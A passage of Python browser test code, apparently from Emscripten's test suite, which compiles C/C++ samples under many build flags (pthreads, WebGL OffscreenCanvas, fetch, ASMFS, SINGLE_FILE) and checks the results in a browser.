assert len(d) > (1 << 27) # more than 32M memory initializer
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1", '-s', 'WASM=0']
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests/canvas_style_proxy_shell.html'), '--pre-js', path_from_root('tests/canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(path_from_root('tests', 'canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(path_from_root('tests', 'custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests', 'custom_messages_proxy_shell.html'), '--post-js', path_from_root('tests', 'custom_messages_proxy_postjs.js')])
@no_wasm_backend('asm.js')
def test_separate_asm(self):
for opts in [['-O0'], ['-O1'], ['-O2'], ['-O2', '--closure', '1']]:
print(opts)
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.html', '-s', 'WASM=0'] + opts)
self.run_browser('test.html', None, '/report_result?0')
print('run one')
create_test_file('one.html', '<script src="test.js"></script>')
self.run_browser('one.html', None, '/report_result?0')
print('run two')
run_process([PYTHON, path_from_root('tools', 'separate_asm.py'), 'test.js', 'asm.js', 'rest.js'])
create_test_file('two.html', '''
<script>
var Module = {};
</script>
<script src="asm.js"></script>
<script src="rest.js"></script>
''')
self.run_browser('two.html', None, '/report_result?0')
print('run hello world')
self.clear()
assert not os.path.exists('tests.asm.js')
self.btest('browser_test_hello_world.c', expected='0', args=opts + ['-s', 'WASM=0', '--separate-asm'])
self.assertExists('test.asm.js')
os.unlink('test.asm.js')
print('see a fail')
self.run_browser('test.html', None, '[no http server activity]', timeout=5) # fail without the asm
@no_wasm_backend('emterpretify')
def test_emterpretify_file(self):
create_test_file('shell.html', '''
<!--
{{{ SCRIPT }}} // ignore this, we do it ourselves
-->
<script>
var Module = {};
var xhr = new XMLHttpRequest();
xhr.open('GET', 'code.dat', true);
xhr.responseType = 'arraybuffer';
xhr.onload = function() {
Module.emterpreterFile = xhr.response;
var script = document.createElement('script');
script.src = "test.js";
document.body.appendChild(script);
};
xhr.send(null);
</script>
''')
try_delete('code.dat')
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '--shell-file', 'shell.html', '-s', 'ASSERTIONS=1'])
self.assertExists('code.dat')
try_delete('code.dat')
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '-s', 'ASSERTIONS=1'])
self.assertExists('code.dat')
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
@no_wasm_backend('mem init file')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'in_flight_memfile_request.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js'] + opts)
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, expect in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'WASM_ASYNC_COMPILATION=1'], 1), # force it on
(['-O1', '-s', 'WASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, expect)
self.btest('binaryen_async.c', expected=str(expect), args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest('binaryen_async.c', expected='1', args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
def test_manual_wasm_instantiate(self):
src = 'src.cpp'
create_test_file(src, self.with_report_result(open(os.path.join(path_from_root('tests/manual_wasm_instantiate.cpp'))).read()))
self.compile_btest(['src.cpp', '-o', 'manual_wasm_instantiate.js', '-s', 'BINARYEN=1'])
shutil.copyfile(path_from_root('tests', 'manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_binaryen_worker(self):
self.do_test_worker(['-s', 'WASM=1'])
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
self.clear()
os.makedirs('cdn')
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=1', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest('benchmark_utf8.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF8ToString"]'])
def test_utf16_textdecoder(self):
self.btest('benchmark_utf16.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF16ToString","stringToUTF16","lengthBytesUTF16"]'])
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
self.assertLess(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has once been used to render WebGL content in a pthread first
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
self.skipTest('This test is disabled because current OffscreenCanvas does not allow transfering it after a rendering context has been created for it.')
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1'])
@requires_threads
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest('gl_only_in_pthread.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-s', 'FULL_ES2=1'])
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-s', 'USE_WEBGL2=0', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH=1'],
# VAO path on WebGL 1.0
['-s', 'USE_WEBGL2=0'],
['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH=1'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1']
self.btest('webgl_offscreen_framebuffer_swap_with_bad_state.c', '0', args=cmd)
# Tests that -s WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1 rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest('webgl_draw_triangle_with_uniform_color.c', '0', args=['-lGL', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-s', 'USE_WEBGL2=1'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@requires_threads
def test_webgl_offscreen_canvas_in_proxied_pthread(self):
for args in [[], ['-DTEST_OFFSCREEN_CANVAS=1'], ['-DTEST_OFFSCREEN_CANVAS=2']]:
cmd = args + ['-s', 'USE_PTHREADS=1', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'GL_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1']
print(str(cmd))
self.btest('gl_in_proxy_pthread.cpp', expected='1', args=cmd)
@requires_threads
@requires_graphics_hardware
def test_webgl_resize_offscreencanvas_from_main_thread(self):
for args1 in [[], ['-s', 'PROXY_TO_PTHREAD=1']]:
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-s', 'OFFSCREENCANVAS_SUPPORT=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1']]:
cmd = args1 + args2 + args3 + ['-s', 'USE_PTHREADS=1', '-lGL', '-s', 'GL_DEBUG=1', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1']
print(str(cmd))
self.btest('resize_offscreencanvas_from_main_thread.cpp', expected='1', args=cmd)
# Tests the feature that shell html page can preallocate the typed array and place it to Module.buffer before loading the script page.
# In this build mode, the -s TOTAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this was is asm.js only (wasm needs a Memory).
@no_wasm_backend('asm.js feature')
def test_preallocated_heap(self):
self.btest('test_preallocated_heap.cpp', expected='1', args=['-s', 'WASM=0', '-s', 'TOTAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', path_from_root('tests', 'test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
for arg in [[], ['-s', 'FETCH_SUPPORT_INDEXEDDB=0']]:
self.btest('fetch/to_memory.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'] + arg,
also_asmjs=True)
def test_fetch_to_indexdb(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/to_indexeddb.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'],
also_asmjs=True)
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/cached_xhr.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'],
also_asmjs=True)
# Tests that response headers get set on emscripten_fetch_t values.
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/response_headers.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'], also_asmjs=True)
# Test emscripten_fetch() usage to stream a XHR in to memory without storing the full file in memory
@no_chrome('depends on moz-chunked-arraybuffer')
def test_fetch_stream_file(self):
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest('fetch/stream_file.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'TOTAL_MEMORY=536870912'],
also_asmjs=True)
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests emscripten_fetch() usage when user passes none of the main 3 flags (append/replace/no_download).
# In that case, in append is implicitly understood.
@requires_threads
def test_fetch_implicit_append(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@no_wasm_backend("fetch API uses an asm.js based web worker to run synchronous XHRs and IDB operations")
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH=1', '-s', 'WASM=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '--proxy-to-worker'],
also_asmjs=True)
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_fetch_in_main_thread.cpp', expected='0', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_fetch_idb_delete(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
os.mkdir('dirrey')
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest('asmfs/hello_file.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_read_file_twice(self):
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), 'hello_file.txt')
self.btest('asmfs/read_file_twice.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_fopen_write(self):
self.btest('asmfs/fopen_write.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_unistd_close(self):
self.btest('unistd/close.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_unistd_access(self):
self.btest('unistd/access.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest('unistd/unlink.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-DNO_SYMLINK=1'])
@requires_threads
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl/test_fcntl_open.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_relative_paths(self):
self.btest('asmfs/relative_paths.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'],
['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_get_device_pixel_ratio.c', expected='1', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_script.cpp'), expected='1', args=['-O3', '--separate-asm'] + args, timeout=30)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', path_from_root('tests', 'canvas_animate_resize_shell.html'), '--separate-asm', '-s', 'GL_DEBUG=1', '--threadprofiler'] + args
print(' '.join(cmd))
self.btest('canvas_animate_resize.cpp', expected='1', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@requires_threads
def test_pthread_hello_thread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS=1'] + modularize + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@no_chrome('https://bugs.chromium.org/p/v8/issues/detail?id=9062')
@requires_threads
def test_pthread_growth_mainthread(self):
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth_mainthread.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=32MB', '-s', 'WASM_MEM_MAX=256MB'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'MODULARIZE_INSTANCE=1'])
run(['-s', 'PROXY_TO_PTHREAD=1'])
# Tests memory growth in a pthread.
@no_chrome('https://bugs.chromium.org/p/v8/issues/detail?id=9065')
@requires_threads
def test_pthread_growth(self):
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=32MB', '-s', 'WASM_MEM_MAX=256MB', '-g'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'ASSERTIONS=1'])
run(['-s', 'PROXY_TO_PTHREAD=1'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
src = 'src.c'
create_test_file(src, self.with_report_result(open(path_from_root('tests', 'pthread', 'hello_thread.c')).read()))
self.compile_btest(['src.c', '-s', 'USE_PTHREADS=1', '-o', 'hello_thread_with_blob_url.js', '-s', 'WASM=0'])
shutil.copyfile(path_from_root('tests', 'pthread', 'main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
opts = ['-s', 'SINGLE_FILE=1', '-s', 'WASM=1']
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
REPORT_RESULT(0);
return 0;
}
'''
create_test_file('test.c', self.with_report_result(src))
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_test_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=['-s', 'SINGLE_FILE=1', '-s', 'WASM=1'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest('minimal_hello.c', '0', args=['-s', 'SINGLE_FILE=1', '-s', 'ENVIRONMENT=web', '-O2', '--closure', '1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
for wasm_enabled in [True, False]:
args = ['src.cpp', '-o', 'test.js', '-s', 'SINGLE_FILE=1']
if wasm_enabled:
args += ['-s', 'WASM=1']
self.compile_btest(args)
create_test_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
